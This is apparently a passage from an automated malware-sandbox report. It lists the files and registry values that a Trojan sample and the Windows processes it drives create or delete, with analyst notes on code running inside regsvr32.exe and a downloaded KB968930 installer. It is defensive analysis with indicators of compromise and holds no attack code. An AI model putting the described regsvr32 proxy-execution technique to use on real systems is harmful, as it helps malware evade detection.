%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\wbem\SET9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\winrm\0409\SET3C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
%System%\winrmprov.mof (0 bytes)
%WinDir%\imsins.BAK (0 bytes)
%System%\SETB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\@.lnk (0 bytes)
%System%\GroupPolicy\Adm\SET21.tmp (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC7.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD0.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD1.tmp (0 bytes)
%System%\SET15.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\SET1C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\SETD.tmp (0 bytes)
%System%\SET10.tmp (0 bytes)
%System%\SETC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (0 bytes)
%WinDir%\inf\SET38.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET20.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)

The process PSCustomSetupUtil.exe:620 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\3LPSVY14\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\VEHKNRUX\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)

The process PSCustomSetupUtil.exe:3908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\FY147AEH\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)

The process PSCustomSetupUtil.exe:1924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\XFJMPSVY\Microsoft.WSMan.Management.dll (9608 bytes)

The process PSCustomSetupUtil.exe:3064 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\2MPSVY14\System.Management.Automation.dll (81046 bytes)

The process PSCustomSetupUtil.exe:2308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\RADGKNQT\Microsoft.PowerShell.Editor.dll (32824 bytes)

The process PSCustomSetupUtil.exe:2224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\CX148BEH\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)

The process PSCustomSetupUtil.exe:3696 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\3MPSVY15\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)

The process PSCustomSetupUtil.exe:3856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\XFILORVY\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)

The process PSCustomSetupUtil.exe:2176 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\L47ADHKN\Microsoft.WSMan.Management.resources.dll (13 bytes)

The process PSCustomSetupUtil.exe:2112 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\HZ258BEH\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:2240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\O7ADGKNQ\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)

The process PSCustomSetupUtil.exe:3992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\VDGJNQTW\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)

The process PSCustomSetupUtil.exe:2288 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\K258CFIL\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)

The process PSCustomSetupUtil.exe:2344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\YGKNQTWZ\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)

The process PSCustomSetupUtil.exe:3952 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\ATWZ258B\Microsoft.PowerShell.Security.dll (2392 bytes)

The process PSCustomSetupUtil.exe:2552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\J258CFIL\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)

The process PSCustomSetupUtil.exe:1496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\7QTWZ258\Microsoft.PowerShell.Security.resources.dll (9 bytes)

The process PSCustomSetupUtil.exe:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\0JMPSVY1\Microsoft.WSMan.Runtime.dll (7 bytes)

The process PSCustomSetupUtil.exe:1868 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\RBEHKNRT\System.Management.Automation.resources.dll (9320 bytes)

The process PSCustomSetupUtil.exe:1284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\WEHKNRUX\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:2556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\TBEILORU\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)

The process PSCustomSetupUtil.exe:2140 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\tmp\GY147ADG\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)

The process yfenaromaf.exe:1664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp3.tmp (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (7385 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (0 bytes)

The process PSSetupNativeUtils.exe:1932 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)

The process mscorsvw.exe:3128 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (68628 bytes)

The process mscorsvw.exe:2592 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5b.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp (0 bytes)

The process mscorsvw.exe:2284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5a.dat (0 bytes)

The process mscorsvw.exe:2072 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index59.dat (0 bytes)

The process mscorsvw.exe:3084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index58.dat (0 bytes)

The process mscorsvw.exe:828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)

The Trojan deletes the following file(s):

%WinDir%\assembly\NativeImages_v2.0.50727_32\index5c.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp (0 bytes)

The process regsvr32.exe:3264 makes changes in the file system. regsvr32.exe is a signed Windows binary whose only job is to load a DLL and call its registration export; file activity attributed to it here means the sample's code is executing inside that process, either as a DLL regsvr32 was asked to load or by injection. The two paths below (an executable under Local Settings\Application Data and a data file under Application Data, both with generated names) are the sample-specific artifacts in this section.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe (1683 bytes)
%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb (4108 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpf7521b9d\bindata865.exe (0 bytes)

The process regsvr32.exe:3404 makes changes in the file system. The copy under Temporary Internet Files\Content.IE5 is the WinINet cache, which shows the KB968930 package was downloaded through the IE networking stack; it is then copied to Temp, executed (see WindowsXP-KB968930-x86-ENG.exe:3964 above) and the cached copy is deleted.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QL4XETI5\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QL4XETI5\WindowsXP-KB968930-x86-ENG[1].exe (0 bytes)

Registry activity

The process %original file name%.exe:1480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 21 26 24 42 0D 64 B0 0A 16 86 EB 7C E3 5A 7D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process mofcomp.exe:3476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 51 16 36 9F 50 0D 16 B3 23 94 51 4D 35 C6 C3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process WindowsXP-KB968930-x86-ENG.exe:3964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 82 8F CC A9 A1 40 A4 F8 51 2C 10 56 2A E6 06"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process new.exe:3664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 58 BA 41 08 9A 12 3C 9B D7 93 76 94 2E 20 36"

The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"{D53EE03B-A6B3-2507-CA3C-8ED347A30FAD}"

The process new.exe:3064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B B8 C8 2C 8F 04 92 5E 14 20 4A 9A 40 F9 90 92"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process net1.exe:2460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D 0E E4 26 9D 40 9F 1E 08 69 C4 F0 93 15 EF 23"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process tasklist.exe:2264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 03 B3 D6 66 83 A3 48 34 6C DF 99 8F 6B 7D 31"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 36 64 D7 9E FF B0 20 FC 56 F3 67 C9 FC EC 94"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 5F AD 6C EC 7C 62 7F BA C4 FA 70 46 1A 06 A3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 C6 03 F0 C9 84 43 E1 6C 20 5B 4D 57 22 90 6B"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 56 86 4C 8D 9E 46 D1 19 B7 8E FA 9D D9 85 D6"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C D6 B0 CB FC CB 8B 30 89 87 F7 CF 2E 72 FB 08"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:2988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 81 77 D3 FF 89 57 BA 30 00 65 04 B7 50 54 0E"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3172 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 A0 EE 99 9F 38 2C 67 59 66 B0 8C CD 5E F2 41"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

